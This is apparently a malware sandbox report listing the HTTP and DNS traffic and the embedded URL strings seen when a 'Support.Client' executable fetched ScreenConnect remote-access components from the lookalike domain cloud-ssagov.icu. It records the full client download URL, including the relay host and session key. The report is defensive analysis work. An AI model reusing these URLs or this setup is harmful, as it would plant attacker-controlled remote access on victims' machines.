Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: cloud-ssagov.icuAccept-Encoding: gzipConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: cloud-ssagov.icu
Source: global traffic	DNS traffic detected: DNS query: api.wisescreen.net

Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: F2E248BEDDBB2D85122423C41028BFD4.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cloud-ssagov.icu
Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2ABD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: svchost.exe, 00000005.00000002.2933943783.00000289A7861000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: Support.Client (1).exe, 00000000.00000002.1846986354.000000000142B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCer
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dfsvc.exe, 00000001.00000002.2547930770.000002CAF4D6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: dfsvc.exe, 00000001.00000002.2548512537.000002CAF4DA9000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: dfsvc.exe, 00000001.00000002.2548284901.000002CAF4D93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab=
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: dfsvc.exe, 00000001.00000002.2548849824.000002CAF4E0C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?409e66e
Source: svchost.exe, 00000005.00000003.1679655637.00000289A76C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000005.00000003.1679655637.00000289A76C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000005.00000003.1679655637.00000289A76C8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000005.00000003.1679655637.00000289A76FD000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.5.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F1410.1.dr	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: dfsvc.exe, 00000001.00000002.2547930770.000002CAF4D6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2ACA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5CA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA940000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert4.
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA381000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2933982070.00000000024AB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024331738.00000000027F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Support.Client (1).exe, 00000000.00000002.1846986354.000000000142B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/
Source: Support.Client (1).exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: dfsvc.exe, 00000001.00000002.2548284901.000002CAF4D93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.a
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA7E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.o
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA7E7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA70F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA87A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA40C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA40C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
Source: dfsvc.exe, 00000001.00000002.2538001925.000002CAF41F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA607000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5E6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Cli
Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA736000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.0000000002461000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1966326894.0000000000711000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.0000000002461000.00000004.00000800.00020000.00000000.sdmp, 4G48BYOD.log.1.dr	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicatio
Source: dfsvc.exe, 00000001.00000002.2547930770.000002CAF4D6D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1967265538.0000000000771000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application%%%
Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application34e089
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application=
Source: Support.Client (1).exe, 00000000.00000002.1846986354.000000000142B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?-N
Source: 4G48BYOD.log.1.dr	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=api.wisescreen.net
Source: dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationDXND
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationND
Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationNDlz
Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationO
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1969933469.000000001AD57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationQ4.XND
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationX
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1966326894.0000000000711000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationation
Source: dfsvc.exe, 00000001.00000002.2549321707.000002CAF4E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationb01mv2)http0
Source: dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationg
Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationime9Zz
Source: dfsvc.exe, 00000001.00000002.2549321707.000002CAF4E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.applicationstem.Drawing%%4
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll
Source: dfsvc.exe, 00000001.00000002.2548893914.000002CAF4E13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.dll3p
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp, 4G48BYOD.log.1.dr	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest
Source: dfsvc.exe, 00000001.00000002.2534096169.000002CAF2B16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Client.manifest4L
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientServi
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll
Source: dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dll3
Source: dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.dlln
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.ClientService.exe
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll
Source: dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dll;
Source: dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Core.dllK
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Win
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.Windows.dll
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShe0
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.e
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe
